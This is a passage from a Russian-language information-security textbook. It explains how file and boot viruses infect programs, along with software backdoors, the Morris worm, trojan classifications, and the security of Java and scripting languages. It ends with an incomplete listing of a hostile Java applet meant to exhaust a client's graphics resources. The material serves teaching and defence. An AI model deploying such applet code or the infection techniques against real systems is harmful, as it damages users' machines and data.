2) стратегии, основанные на перехвате выполняемой с файлом опе-
рации:
 заражение создаваемых файлов;
 заражение открываемых файлов;
 заражение запускаемых на выполнение файлов;
 заражение считываемых файлов;
 заражение переименуемых файлов;
 заражение файлов, которым присваиваются атрибуты или атрибу-
ты которых читаются;
 заражение закрываемых файлов.
При заражении вирус может выполнять ряд операций, маскирую-
щих и ускоряющих его распространение.
Жизненный цикл вредоносной программы:
1. Проникновение
Применение методов социальной инженерии
2. Инсталляция
3. Борьба с антивирусами
Установка своих файлов, служб, драйверов
Обеспечение автозапуска
Сокрытие в системе (маскировка)
Инъекция в другие процессы
4. Вредоносная активность
Вредоносная нагрузка
Обновление
В упрощенном виде механизм заражения программных файлов вы-
глядит следующим образом. Программа-вирусоноситель обычно изме-
няется так, чтобы по окончании загрузки ее в оперативную память
180
управление передавалось вирусу. Используя информацию о расположе-
нии выполняемых программ, инициализированный вирус приступает к
поиску очередной программы-жертвы. Если программный файл, удовле-
творяющий требованиям выбора, найден, происходит его заражение.
Копия вируса вставляется в заражаемую программу (в начало, середину
или конец). Производится корректировка ее кода, обеспечивающая пе-
редачу управления вирусу до начала выполнения самой программы. Да-
лее вирус восстанавливает свою программу-носитель и передает ей
управление.
Для различных типов вирусов процесс заражения имеет некоторые
особенности. Рассмотрим его применительно к файловым и бутовым ви-
русам.
Файловые вирусы способны заражать любой тип исполняемых
файлов. Наиболее просто заражаются СОМ-файлы, которые содержат
готовые к выполнению машинные программы, инвариантные к адресу
загрузки. Такая программа не может занимать более одного сегмента (64
Кбайт) и допускает загрузку в оперативную память практически без
настройки содержащихся в ней адресов (настройка ограничивается запи-
сью в сегментные регистры адреса загрузки).
Нерезидентные файловые вирусы инициализируются после загруз-
ки в память зараженных программных файлов. Получив управление, ви-
рус проверяет, та ли используемая в компьютере версия операционной
системы, под которую он разработан.
При операционной среде, несоответствующей ориентации вируса,
производится переход на выполнение набора завершающих действий.
Вирус восстанавливает программу-вирусоноситель, переписывая сохра-
ненные в своем теле байты ее начала на прежнее место, приводит в ис-
ходное состояние регистры микропроцессора и передает управление
программе-вирусоносителю.
Если операционная среда для вируса подходит, осуществляется
просмотр текущего каталога и поиск в нем очередного СОМ-файла. Тип
файла определяется по его расширению или по содержанию его началь-
ных байтов. Найденный СОМ-файл считывается и подвергается провер-
ке на зараженность данным вирусом. Способы проверки зараженности
файла достаточно разнообразны (нахождение отметок о заражении, по-
иск сигнатуры вируса в файле путем его сканирования и др.). В том слу-
чае, когда файл оказался зараженным, выполняется поиск следующего
файла типа СОМ. Файл, оказавшийся незараженным, проходит еще одну
проверку - на заражаемость (поддается ли он заражению данным виру-
181
сом). Если заражение СОМ-файла невозможно, ищется новая жертва,
если возможно - реализуется непосредственно сама процедура зараже-
ния.
Прежде всего, вирус снимает с заражаемого файла атрибут READ
ONLY и фиксирует в своем теле дату его создания. Затем им осуществ-
ляется перепись начальных байтов заражаемого файла в свое тело. Вме-
сто них записывается сформированная вирусом команда безусловной
передачи управления вирусу. Копия вируса помещается в конец заража-
емого файла. Заражение завершается присвоением зараженному файлу
значений атрибутов, которые он имел до заражения.
Вирусы могут настраиваться на единичное и множественное зара-
жение. Поэтому после окончания процедуры заражения предусматрива-
ется проверка условий настройки вируса. Если число реализованных за-
ражений меньше требуемого, процесс выполнения вирусной программы
продолжается. В противном случае он завершается восстановлением
начала программы-вирусоносителя, приведением в исходное состояние
регистров микропроцессора и передачей управления программе-
вирусоносителю.
Тело вируса при заражении может имплантироваться не только в
конец, но и в начало и в середину заражаемого файла.
Для имплантации в начало заражаемого файла необходимо его
начальную часть, соответствующую по размерам телу вируса, перепи-
сать в конец. Перед передачей управления программе-вирусоносителю
она восстанавливается, а вирусный код перемещается на другое место.
Очевидно, при размещении в начало заражаемого файла вирус будет по-
лучать управление непосредственно.
Некоторые примитивные вирусы реализуют запись своей копии в
начало заражаемого файла без сохранения его содержимого (без увели-
чения его длины). Чтобы скрыть факт нарушения файла, применяются
определенные меры маскировки (например, его выполнение имитирует-
ся выдачей сообщения об ошибке).
Имплантация тела вируса в середину заражаемого файла предпола-
гает перепись соответствующей части его кода в конец и обеспечение
передачи управления вирусу. Если файл содержит рабочие области до-
статочного размера, вирус размещает свою копию без увеличения длины
файла.
Резидентные файловые вирусы инициализируются при выполнении
зараженных программных файлов, а точнее при обращении их к опреде-
ленным функциям операционной системы (обычно функциям обслужи-
182
вания файлов), причем с передачей управления инсталлятору. После
инициализации инсталлятор проверяет версию операционной системы и
зараженность оперативной памяти. При соответствии результатов этих
проверок условиям заражения копия вируса переписывается в оператив-
ную память, и выполняются действия, необходимые для закрепления ее
участка за вирусом. Затем инсталлятор обеспечивает реализацию пере-
хвата прерываний путем замены адресов в соответствующих элементах
вектора прерываний на адреса своих модулей обработки, восстановле-
ние измененных байтов файла-вирусоносителя и передачу ему управле-
ния. Данная часть выполняемых инсталлятором операций составляет
первую фазу функционирования вируса - фазу его инсталляции.
За фазой инсталляции следует фаза слежения. На ней каждый раз
при возникновении прерывания и его перехвата управление получает
соответствующий модуль обработки. Он анализирует контекст обраще-
ния программы к операционной системе, определяет имя ее файла, за-
ражает этот файл при выполнении с ним той или иной операции (запуска
на выполнение, открытия, чтения и т.п.) и передает управление заражен-
ному файлу.
Бутовые вирусы заражают загрузочный (первый) сектор дискет или
жесткого диска. Механизм заражения для всех бутовых вирусов одина-
ков. Расположенный на дискете вирус сначала внедряется в оператив-
ную память компьютера. Это происходит при загрузке операционной
системы. Программа начальной загрузки считывает содержимое загру-
зочного сектора инфицированной дискеты в оперативную память и пе-
редает управление вирусу. С получением управления бутовый вирус ко-
пирует себя, считывает с дискеты свое продолжение (если оно имеется)
и устанавливает значения векторов прерываний (12h и 13h), обеспечи-
вающие защиту вирусного тела и перехват обращений к дискете (диску).
После выполнения этих действий управление от вируса передается на
системный загрузчик, который осуществляет стандартную загрузку опе-
рационной системы. Дальнейшие действия бутового вируса примерно
такие же, что и резидентного файлового вируса - перехват обращений к
дискам, обработка прерываний и инфицирование загрузочных секторов
дисков.
При любом обращении к диску управление получает вирусный об-
работчик этого прерывания. Он определяет, к какому типу диска отно-
сится обращение: дискете или винчестеру. Затем проверяется, заражен
уже диск или нет. Если диск еще не заражен, производится его зараже-
ние. Бутовый вирус переносит содержимое загрузочного сектора диска в
183
какой-либо другой сектор и копирует на этот участок памяти свое тело.
Когда длина вирусной копии больше длины загрузочного сектора, то в
нем помещается ее начальная часть. Части продолжения вируса разме-
щаются в других секторах.
Для размещения загрузочного сектора-оригинала и продолжения
вируса могут задействоваться:
сектора свободных кластеров логического диска;
неиспользуемые или редко используемые системные сектора;
сектора за пределами логического диска.
Поиск секторов свободных кластеров на диске ведется с помощью
таблицы размещения файлов FAT. Задействованные свободные класте-
ры вирус помечает в таблице FAT как сбойные.
Неиспользуемыми или редко используемыми системными сектора-
ми принято считать: на дискете - последние сектора корневого каталога,
на винчестере - сектора между MBR и первым Boot-сектором.
Сектора за пределами диска - это сектора, создаваемые вирусом пу-
тем форматирования на диске дополнительного трека. Данный способ
размещения загрузочного сектора-оригинала и продолжения вируса
встречается сравнительно редко.
Далее вирус переписывает системную информацию загрузчика-
оригинала (из Boot-cектора дискет - BIOS Parameter Block, из MBR -
Disk Partition Table) в свой код и, наконец, передает управление загруз-
чику-оригиналу.
Следует отметить, что бутовыми вирусами могут заражаться не
только системные дискеты (содержащие ОС), но и несистемные (содер-
жащие любую другую информацию). Фаза проявления, состоящая в вы-
полнении несанкционированных действий, может чередоваться с раз-
множением или начинаться через некоторое время (инкубационный пе-
риод). Типовыми видами проявлений вирусов-вандалов являются:
прекращение выполнения отдельных функций программы (напри-
мер, блокирование загрузки программы с защищенной от записи диске-
ты, блокирование запуска антивирусных программ);
выполнение непредусмотренных действий (к примеру, изменение
данных в файле);
разрушение отдельных файлов, управляющих блоков или всей фай-
ловой системы (путем удаления файлов, форматирования диска и т.п.);
имитация ошибок и сбоев в системных и пользовательских про-
граммах (переполнение, перезагрузка, зависание);
блокирование доступа к системным ресурсам;
184
ускоренный износ оборудования (НГМД);
создание визуальных и звуковых эффектов (падение букв на экране,
проигрывание мелодий, выдача различных изображений, ложных и от-
влекающих сообщений).
Несанкционированные действия, выполняемые вирусами, могут
обусловливаться наступлением определенных событий (установка за-
данной даты, заражение заданного числа программ и т.п.).
Наиболее уязвима от вирусов файловая система MS DOS, Windows
9X - FAT, а в ней таблица размещения файлов. Если происходит разру-
шение таблицы FAT, ОС не может определить местонахождение файлов,
хотя сами файлы целы. На компьютерах типа РС АТ данные о конфигу-
рации (тип винчестера, число НГМД и др.) хранятся в небольшой энер-
гонезависимой памяти (CMOS). Уничтожение ее содержимого приводит
к невозможности загрузки с жесткого диска.
4.2. Программные закладки

Рассмотрение воздействия закладки и программ защиты информа-
ции можно сравнить с взаимодействием вируса и прикладной програм-
мы. Вирус может присоединиться к исполняемому файлу, соответству-
ющим образом изменив его, может уничтожить некоторые файлы или
встроиться в цепочку драйверов. Закладка отличается более направлен-
ным и тонким воздействием. Однако ясно, что и вирус, и закладка долж-
ны скрывать свое присутствие в операционной среде компьютерной си-
стемы. Особенностью закладок может быть и то, что они фактически
становятся неотделимы от прикладных или системных программ, если
внедрены в них на стадии разработки или путем обратного проектирова-
ния (путем дисассемблирования прикладной программы, внедрения кода
закладки и последующей компиляции).
Если компьютерная система содержит механизмы защиты от НСД,
то несанкционированные действия могут быть вызваны следующими
основными причинами:
отключение или видоизменение защитных механизмов нелегаль-
ным пользователем;
вход в систему под именем и с полномочиями реального пользова-
теля.
В первом случае злоумышленник должен видоизменить защитные
механизмы в системе (например, отключить программу запросов паро-
лей пользователей), во втором - каким-либо образом выяснить или под-
185
делать идентификатор реального пользователя (например, подсмотреть
пароль, вводимый с клавиатуры).
В обоих случаях НСД можно представить моделью опосредованно-
го доступа - когда проникновение в систему осуществляется на основе
некоторого воздействия, произведенного предварительно внедренной в
систему программой или несколькими программами.
Например, злоумышленник создал программное средство и внедрил
его каким-либо способом в систему проверки прав доступа и предостав-
ления этих прав. Тогда при осуществлении доступа легального пользо-
вателя внедренная в систему программа запомнит его пароль и сохранит
в заранее известном доступном злоумышленнику файле, а затем неле-
гальный пользователь воспользуется данным паролем для входа в си-
стему.
В другом случае злоумышленник может изменить часть системы
защиты так, чтобы она перестала выполнять свои функции (например,
изменит программу шифрования вручную или при помощи некоторой
другой программы так, чтобы она перестала шифровать или изменила
алгоритм шифрования на более простой).
Описанные ситуации, в которых применяется понятие закладки, не-
сколько отличается от ранее использованной в литературе. Ранее поня-
тие закладки в основном связывалось с разработкой программного обес-
печения, а конкретно, с написанием исходных текстов программ, в кото-
рых создаются дополнительные функции (в иностранной литературе ло-
гическая бомба, логический люк, троянский конь). Следовательно, ранее
закладка понималась как внутренний объект защищенной системы.
Однако, вообще говоря, закладка может быть и внешним по отно-
шению к защищенной системе объектом.
4.3. Средства нарушения безопасности сетей в АС

Если вирусы и троянские кони наносят ущерб посредством лавино-
образного саморазмножения или явного разрушения, то основная функ-
ция РПС, действующих в компьютерных сетях, — взлом атакуемой си-
стемы, т.е. преодоление защиты с целью нарушения безопасности и це-
лостности.
В более 80% компьютерных преступлений, расследуемых ФБР,
"взломщики" проникают в атакуемую систему через глобальную сеть In-
ternet. Когда такая попытка удается, будущее компании, на создание ко-
торой ушли годы, может быть поставлено под угрозу за какие-то секун-
ды.
186
Этот процесс может быть автоматизирован с помощью специально-
го вида РПС, называемого сетевой червь. Червями называют вирусы,
которые распространяются по глобальным сетям, поражая целые
системы, а не отдельные программы. Несомненно, это самый опасный
вид вирусов, так как объектами нападения в этом случае становятся ин-
формационные системы государственного масштаба. С появлением гло-
бальной сети Internet этот вид нарушения безопасности представляет
наибольшую угрозу, т. к. ему в любой момент может подвергнуться лю-
бой из 30 миллионов компьютеров, подключенных к этой сети.
Наиболее известен вызвавший всемирную сенсацию и привлекший
внимание к вирусной проблеме инцидент с вирусом-червем в глобаль-
ной сети Internet. Второго ноября 1988 года студент Корнелловского
университета Роберт Моррис (Robert Morris) запустил на компьютере
Массачусетского технологического института программу-червь, которая
передавала свой код с машины на машину, используя ошибки в системе
UNIX на компьютерах VAX и Sun. В течение 6 часов были поражены
6000 компьютеров, в том числе компьютеры Исследовательского инсти-
тута НАСА и Национальной лаборатории Лоуренса в Ливерморе — объ-
екты, на которых проводятся самые секретные стратегические исследо-
вания и разработки. Червь представлял собой программу из 4000 строк
на языке "С" и входном языке командного интерпретатора системы
UNIX. Следует отметить, что вирус только распространялся по сети и не
совершал каких-либо разрушающих действий. Однако это стало ясно
только на этапе анализа его кода, а пока вирус распространялся, вычис-
лительных центрах царила настоящая паника. Тысячи компьютеров бы-
ли остановлены, ущерб составил многие миллионы долларов.
Обычно целью взлома сетей является приобретение нелегальных
прав на пользование ресурсами систем. Таким образом, если раньше
РПС пассивно вносился систему, и для его инициализации необходимы
был действия пользователя, то сейчас РПС сам проникает систему и са-
мо определяет время и степень своей активности.
Иногда взлому системы предшествует "разведка" исследование
средств защиты атакуемой системы с целью обнаружения слабых мест и
выбора оптимального метода атаки. Это могут быть как тривиальные
попытки подбора паролей(кстати, 80% атак осуществляются именно
этим способом) так и попытки проанализировать имеющееся на атакуе-
мой машине программное обеспечение на предмет наличия в нем "дыр"
или "люков", позволяющих злоумышленнику проникнуть в систему.
187
Таким образом, возникает специфический вид РПС — программы,
осуществляющие проникновение в удаленную систему. Это дает воз-
можность злоумышленнику лично, или с помощью других программ,
осуществлять НСД к ресурсам этой системы, нарушать ее безопасность
и целостность и т. д.
4.4. Классификация троянских программ

Троянские программы классифицируются по следующим призна-
кам:
 по способу инсталляции
 по методам получения информации
 по режимам работы
Классификация по способу инсталляции
Троянские программы по способу инсталляции бывают с сетевыми,
консольными или удаленными инсталляторами.
К первому типу относятся BackOrifice, NetBus, всевозможные вари-
ации на подобные темы и их производные. Доступ к компьютеру вла-
дельца не нужен. Нужно только, чтобы компьютер-цель была видна (в
случае локальной сети), либо был известен IP жертвы (в случае Internet).
Консольная инсталляция требует от клиента доступа к терминалу
владельца без его присутствия. Программы такого типа требуют ручной
настройки и маскировки. Их можно использовать не только в хулиган-
ских целях, но и в интересах собственной безопасности. Самой распро-
страненной программой с подобным интерфейсом является HookDump.
Технология ее использования довольно проста: достаточно запустить ее
на машине владельца и, указав ей, за чем надо следить. Правда, получать
информацию клиента придется с использованием консольного доступа.
Удаленная инсталляция троянской программы в виде настроенного
автоматизированного комплекса в рабочем состоянии посылается пись-
мом или переписывается на носитель и вручается объекту-атаки. Тот
пользуется полезной программой, которая временами дает поработать и
троянской программы.
Классификация по методам получения информации
Троянские программы могут поддерживать сетевое, консольное ли-
бо интерактивное предоставление информации клиенту. Это основные
направления, существуют троянские программы, совмещающие все три
типа в одном.
188
Сетевой тип представляет собой всего лишь почтовое письмо с ин-
формацией, которая может быть полезна клиенту. Обычно такая инфор-
мация шифруется или маскируется под вполне безобидные вещи -
например, под электронную подпись PGP. Характер информации опре-
деляется режимом работы троянской программы.
Консольное предоставление информации - самый простой способ
ведения записей, но немного неудобный при возникновении трудностей,
относящихся к доступу к объекту-атаке. Кроме того, объем записей воз-
растает и файлы большого объема могут послужить одной из улик, пер-
вым шагом к разоблачению троянских программ.
Интерактивный тип предоставления информации - обычно самый тя-
желый в реализации механизма работы троянских программ, но с его по-
мощью клиент может в некоторых случаях получить очень непредсказуе-
мые результаты. Одной из таких программ является Network Crack Wizard.
Классификация по режимам работы
Троянские программы могут играть роль монитора, удаленного ад-
министратора, суфлера, шпиона, робота либо маскирующего автомата
типа партизан - 2000. Некоторые троянские программы совмещают в се-
бе все типы.
Монитор - пассивный наблюдатель, который просто наблюдает за
"деятельностью в автоматизированной системе и записывает изменения
состояния жертвы в специальный журнал, который потом может быть
послан злоумышленнику или будет забран им самим. При этом можно
задать фильтры - например, не записать события о работе с MS Word.
Просто мониторы ставят очень редко, часто они работают и как системы
удаленного администрирования, суфлер или шпион. Тогда производи-
мые наблюдения послужат сигналом к началу каких-то более активных
действий, выбору более выгодных - оптимальных для этого условий или
собственной деинсталляции.
Суфлер – это программа, которая, предназначена, чтобы подсказы-
вать, что-то, а в некоторых случаях и полностью замещать владельца
троянской программы (естественно, в некоторых - нужных клиенту слу-
чаях). Довольно трудно сразу уяснить себе, где именно можно найти
применение такой программа. Например, отправка сообщений, скачива-
ние изображений, просто загрузка трафика, хранение скрытой информа-
ции или порча важных документов в "c: .. \Мои документы".
Роботы - программы, беспрекословно выполняющие команды кли-
ента, имеющие базовый набор функций, которые можно вызывать,
189
например, посылкой почтой определенных слов где-то в тексте или в
теме письма:
From: spamer@inkognito.ru
To: torjanowner@lamaz.com
Subj: Хотите подпишу на anekdot.mail??? ...
Робот, проверяющий почту еще при ее получении или позже в вхо-
дящих сообщениях, обнаружит это сообщение (от spamer@inkognito.ru)
и найдет там, например, слова anekdot.mail. Для него это может быть
командой на отправку паролей на доступ к ftp-серверу и самоуничтоже-
ние. Вообще говоря, отдача приказов может происходить различными
способами, и конкретно на поведение троянской программы это не
должно влиять никаким образом.
Также следует отличать троянские программы-шпионы, которые
управляются событиями (например, соединения с Internet вообще или с
каким-то отдельным сервером в нем, приемом/отправкой почты или за-
пуском ICQ/посылкой icq-сообщений). Все их реакции определяются ре-
акцией на определенные события.
И, наконец, последний тип этого класса - партизаны, мирно суще-
ствующие в автоматизированной системе. Они управляются по событи-
ям, то есть запустил пользователь, например, программу PGP, чтобы за-
труднить чтение злоумышленником электронной почты, и разбудил вот
такого партизана, который например, отключил систему шифрации PGP
и стал передавать электронную почту менее защищенным способом.
4.5. Проблемы безопасности информации при распреде-

ленной обработки информации
При распределенной обработки информации применяются следую-
щие потенциально опасные технологии:
1. Java – технологий.
2. Технологии скриптов (сценариев).
3. Технологии cookes.
4. Технологии фреймов.
5. Технологии ActiveX.
Рассмотрим проблемы безопасности этих технологий подробнее.
4.5.1. Особенности Java – технологий
Технология Java была разработана компанией Sun Microsystems в

начале 90-х годов в связи с возникновением острой необходимости в
190
компьютерных программах, ориентированных на использование в сете-
вой среде и интеграцию с Web-сервисом. К таким программам изна-
чально были предъявлены требования по мобильности, предполагающие
независимость от аппаратных и операционных платформ, а также без-
опасность и надежность обработки информации [15].
Для снижения сложности программирования и количества допуска-
емых ошибок в язык Java были внесены жесткая объектная ориентация
описаний и строгая типизация данных. Строгая типизация информаци-
онных элементов позволяет на стадии компиляции выявлять ошибки,
связанные с несовместимостью типов данных.
Реализованный в языке модульный принцип построения программ и
простота языка дают возможность не только быстро разрабатывать новые
про граммы, но и применять элементы уже написанных и проверенных
про грамм, а также эффективно модернизировать старые. Кроме того, в
стандарт языка входит множество полезных библиотек, на основе кото-
рых можно строить вычислительные системы любой сложности. Этот
стандартный на бор постоянно пополняется новыми важными функция-
ми.
Независимость от аппаратно-операционных платформ, а также без-
опасность и надежность обработки информации были достигнуты разра-
боткой виртуального Java-процессора, предназначенного для выполне-
ния Java-программ путем их интерпретации. Определены его архитекту-
ра, представление элементов данных и система команд.
Виртуальный Java-процессор обеспечивает среду для исполнения
Java-программ. При этом любая Java-программа должна соответствовать
спецификации этого абстрактного процессора, которая полностью опре-
деляет его машинно-независимую систему команд, типы обрабатываемых
данных, а также регистры. Поэтому для возможности исполнения Java-
программы виртуальным Java-процессором ее исходные тексты должны
быть оттранслированы в высокоуровневые машинно-независимые коды
этого абстрактного процессора, называемые байт-кодами.
Оттранслированные Java-программы, предназначенные для выпол-
нения на рабочей станции в среде Web- браузера, называют Java-
аплетами или мобильным кодом. По своей структуре каждый аплет
представляет собой не большую программку, в которой должно быть
определено несколько обязательных функций. Аплет загружается по се-
ти с сервера и выполняется в среде Web- браузера (см. рис. 31). Ссылки
на аплеты располагаются в Web-документах, но непосредственно в со-
став Web-документов аплеты не входят. Они хранятся в отдельных фай-
191
лах на сервере. Виртуального Java-процессора, который и предназначен
для интерпретации аплетов.
Рис. 31. Схема передачи и выполнение Java-аплетов

Байт-коды разрабатывались так, чтобы максимально сократить сред-
нюю длину команды. Java-процессор имеет минимум регистров, стеко-
вую архитектуру и часто использует косвенную адресацию. Поэтому
большинство из команд занимает всего один байт, к которому добавляет-
ся при необходимости номер операнда. Кроме того, для обработки каждо-
го типа данных Java-процессор имеет свой набор команд. В результате
средняя длина Java-команды составляет всего 1,8 байта. Средняя длина
команды для классических RISC-процессоров равна примерно 4 байтам.
Для высокой надежности и безопасности выполнения Java-аплетов
предусмотрены две важные функции:
проверка байт-кодов перед их выполнением на целостность и пра-
вильность инструкций;
контроль и блокирование опасных действий в процессе интерпре-
тации байт-кодов.
Первую функцию реализует загрузчик и верификатор байт-кодов, а
вторую — диспетчер безопасности виртуального Java-процессора. Дис-
петчер безопасности запрещает аплетам осуществлять доступ к файлам
и периферийным устройствам, а также выполнять системные функции,
такие как распределение памяти.
Виртуальный Java-процессор обеспечивает выполнение и других
192
функций, влияющих на надежность обработки информации, например,
освобождение неиспользуемой оперативной памяти. Кроме того, язык Java
содержит необходимые средства для корректной работы со всеми объек-
тами и ресурсами в случае возникновения исключительных ситуаций.
Технологический цикл подготовки Java-аплетов тот же, что и для
программ на других языках программирования. Отличием является лишь
то, что при редактировании внешних связей требуемые компоненты мо-
гут доставляться по сети. Процесс выполнения аплетов существенно от-
личается от аналогичного процесса для обычных программ (см. рис. 32).
Подготовка аплетов Выполнение аплетов
Исходные Виртуальный Java-

тексты на процессор
языке Java
Загрузка и проверка
байт-кодов
Компиляция и
редактирование
внешних связей
Передача
байт-кодов по Интерпретация байт-
сети кодов с контролем и
Байт-коды блокированием
Java опасных действий
Рис. 32. Схема подготовки и выполнения Java-аплетов.

Поскольку аплеты и другие части прикладной системы хранятся на
сервере, то за счет централизации облегчается сопровождение и админи-
стрирование системы. Это в свою очередь гарантирует, что пользователь
всегда будет использовать самые последние версии программ.
Следует отметить, что на языке Java могут создаваться не только
аплеты, являющиеся мигрирующими программами, но и стационарные
программные приложения. Однако для высокого быстродействия исход-
ный текст таких программ следует компилировать не в байт-коды, а в
машинно-зависимые коды, обеспечивающие высокую скорость исполне-
ния.
В настоящее время существует достаточное количество инструмен-
193
тальных средств для разработки как Java-аплетов, так и Java-
приложений. Среди них — Microsoft Visual J++, Symantec Cafe, Borland
Jbuilder, Sun Microsystems Java Workshop и ряд других.
4.5.2. Проблемы безопасности языков сценариев
Параллельно с мощной Java-технологией появились технологии со-

здания и применения мигрирующих программ, основанные на использо-
вании языков сценариев [17]. Наиболее важным отличием таких техно-
логий от Java-технологии является покомандная интерпретация исход-
ных текстов программ, исключающая необходимость их компиляции
перед выполнением. Вспомним, что в Java-технологии мобильная Java-
программа для возможности выполнения должна быть откомпилирована
в байт-коды. Функция интерпретации мобильного кода, написанного на
языке сценариев, возложена на Web- браузер.
Языки сценариев часто называют еще языками скриптов (script —
сценарий) или макроязыками. Их интерпретируемая природа упрощает
отладку и создание составленных на них программ. К основным пред-
ставителям языков сценариев, предназначенных для написания мигри-
рующих программ, относятся:
язык JavaScript, разработанный совместно компаниями Netscape и
Sun Microsystems, а также подобный ему язык VBScript от Microsoft;
язык VRML, разработанный компанией Silicon Graphics.
Язык сценариев JavaScript впервые появился в Web- браузере
Netscape Navigator 2.0 под названием Live Script. JavaScript не представ-
ляет собой производную от Java (см. табл. 8).
Таблица 8
Сравнительные характеристики языков Java и JavaScript
Java JavaScript
Программа для возможности выполнения Программа интерпретируется на стороне
на стороне клиента откомпилирована в клиента в исходном виде.
байт коды.
Объектно-ориентирован. Аплеты обра- Объектно-базирован. Отсутствуют клас-
зуют объектные классы с наследованием. сы и механизм наследования.
194
Аплеты вызываются из Web-страниц, но Программы вызываются из Web–страниц
страницы хранятся обособленно от Web- и встроены непосредственно в Web-
документов. документы.
Статическое связывание. Объектные Динамическое связывание. Объектные
ссылки должны существовать на этапе ссылки проверяются во время выполне-
компиляции. ния.
Типы данных и переменные должны Типы данных и переменные не объявля-
быть объявлены. ются.
Не может осуществляться запись в дис- Не может осуществляться запись в дис-
ковую память и выполнять системные ковую память и выполнять системные
функции. функции.
JavaScript является упрощенным интерпретируемым языком с базо-
выми объектно-ориентированными функциями. Свойство простоты объ-
ясняется отсутствием жесткой архитектуры типов и семантики. Объект-
но-ориентированная ориентация проявляется в возможностях работы с
окнами, строкой состояния и другими элементами интерфейса Web-
браузера и сетевого окружения как с объектами в иерархии, к которым
можно обращаться по имени.
JavaScript беднее языка Java, но гораздо удобнее и эффективнее для
ряда за дач, связанных с обработкой Web-документов и взаимодействи-
ем с пользователем при его просмотре. Он имеет большое число встро-
енных функций и команд. Программы, написанные с помощью JavaS-
cript, могут выводить на экран диалоговые окна, производить математи-
ческие вычисления, проигрывать различные аудио- и видеофайлы, полу-
чать новые документы, обрабатывать нажатие на кнопки в формах и
многое другое. С помощью JavaScript можно также устанавливать атри-
буты и свойства бинарных библиотек Java, a также программных моду-
лей (plug-ins), подключенных к Web- браузеру.
Команды JavaScript встраиваются непосредственно в Web-страницу
и выполняются Web- браузером во время загрузки этой страницы или во
время определенных действий, производимых пользователем при работе
с ней например, при щелчке мышью на одном из объектов страницы,
при позиционировании указателя в место расположения ссылки или при
вводе ин формации в поля HTML-формы.
Как и для любой другой технологии или языка, используемого в
вычислительной сети, обеспечение безопасности обработки информации
является первоочередной задачей. В JavaScript не реализованы некото-
рые возможности, поскольку они косвенно делают защиту более уязви-
мой. Программе на JavaScript, как и программе на языке Java, запрещено
выполнять операции с локальными файлами. Поэтому программа не в
состоянии изменять или получать доступ к пользовательским данным.
195
Кроме того, язык JavaScript не поддерживает сетевые функции. Он не
может, напрямую открыть порт TCP/IP, а способен только обеспечить
загрузку объекта по заданному адресу и формирование данных, переда-
ваемых Web-серверам. Современные браузеры позволяют устанавливать
уровни безопасности и управлять ими так, что программа на JavaScript
может обратиться только к ограниченному кругу информации.
Быстрота создания программ, небольшие размеры программных
модулей, удобный доступ ко всем внутренним функциям браузера, а
также безопасность JavaScript-технологии привели к высокой популяр-
ности языка JavaScript, не уступающей популярности языка Java.
К недостаткам технологии JavaScript следует отнести невысокое
быстродействие JavaScript-программ, являющееся неотъемлемым атри-
бутом всех интерпретируемых языков программирования.
Необходимо отметить, что реализации языка JavaScript компаний
Netscape и Microsoft различаются. Эти браузеры Netscape Navigator и In-
ternet Explorer. Поэтому при создании приложений на JavaScript необхо-
дима проверка их работоспособности в среде различных программ нави-
гации.
Язык сценариев VBScript от Microsoft во многом подобен
JavaScript. Он является подмножеством языка Visual Basic и также пред-
назначен для программирования Web страниц. С его помощью можно
заставить взаимодействовать разные объекты на Web-странице, включая
программные компоненты другого типа, например, аплеты Java и про-
граммные компоненты ActiveX Controls.
В отличие от макроязыков JavaScript и VBScript язык VRML разра-
ботан корпорацией Silicon Graphics специально для создания интерпре-
тируемых программ, моделирующих трехмерные виртуальные миры.
Интерпретаторы VRML подключаются к браузерам чаще всего в виде
отдельных программных модулей (plug-ins). Исходные тексты программ
на языке VRML оформляются в виде отдельного VRML-файла и вызы-
ваются по ссылке с Web-документа при его просмотре браузером. Щел-
чок мышью по такой ссылке приводит к открытию отдельного окна,
позволяющего пройтись по расположенному в нем фрагменту трехмер-
ной реальности.
4.5.3. Типовые уязвимости в системе защиты Java
Ошибки JVM браузера Netscape Communicator

В апреле 1999 года была обнаружена уязвимость важного компо-
нента безопасности JVM браузера Netscape Communicator. При опреде-
196
ленных обстоятельствах виртуальная машина Java не проверяет загру-
жаемый в нее код. Использование этого изъяна позволяет взломщику за-
пустить код, разрушающий механизмы проверки типов Java, и реализо-
вать взлом со смешением типов.
Уязвимость в механизме обеспечения безопасности Microsoft Java
В браузере Internet Explorer вскоре была обнаружена аналогичная
ошибка. Из-за недостатков реализации механизма обеспечения безопас-
ности в JVM компании Microsoft появилась возможность полностью
обойти механизмы защиты с помощью хитро запрограммированного
аплета, размещенного на удаленном Web-сервере, или встроенного в со-
общение электронной почты в формате HTML.
Brown Orifice и новые ошибки в Java
Летом 2000 года появилась информации о двух выявленных уязви-
мостях, относящихся к реализации Java в Netscape Communicator. В част-
ности, было установлено, что в файлах библиотек классов Java при вы-
полнении определенных операций не выполняется надлежащая проверка
безопасности или результаты этой проверки игнорируются. В число клас-
сов, о которых идет речь, входит класс java.net.ServerSocket, используе-
мый для создания прослушиваемых сетевых сокетов для входящих сете-
вых соединений, а также классы Netscape.net. URLConnection и
Netscape.net.URLinputSteam, содержащие абстрактные стандартные мето-
ды чтения локальных файлов. Во всех этих трех классах содержатся ме-
тоды, в которых некорректно вызывается метод SecurityManager.check,
определяющий, действительно ли данный аплет обладает правами досту-
па, необходимыми для выполнения некоторых действий. Если проверка
завершилась неудачей, то это исключение игнорируется.
Оба этих изъяна были заложены в реализацию аплета Java, в кото-
ром перечисленные методы служат для создания портов прослушивания
и получения права на чтение файловой системы.
Программа поддерживает возможности, подобные возможностям
программного продукта Napster, позволяя пользователям совместно ра-
ботать с файлами через одноранговую сеть, которая создается миллио-
нами пользователей, ведущих обмен данными с помощью протокола
HTTP.
Примеры зловредных Java-аплет и скриптов
Атакующий Java-аплет
Java-аплет может быть встроен в код html-документа и запущен на
исполнение при открытии страницы Web-сайта. Простейший вариант
197
атакующего Java-аплета приведен ниже. Функция, активизирующая при
отпускании клавиши мыши должна "забить" GDI-ресурсы клиентской
станции.
public boolean mouseUp(Event evt, int x, int y)
{ Image img = createImage(600, 400);
Graphics gc = img.getGraphics();
int max = 0x7fffffff;
int min = 0x80000000;
if(!fried) { gc.drawLine(299, 924, max, max); fried = true; }
else {Graphics g = getGraphics();
g.setColor(Color.black);
g.fillRect(0, 0, size().width, size().height);
g.setColor(Color.white);
FontMetrics fm = g.getFontMetrics();
String s = "Working, please wait... The damage might be worse each
time you press the button!";
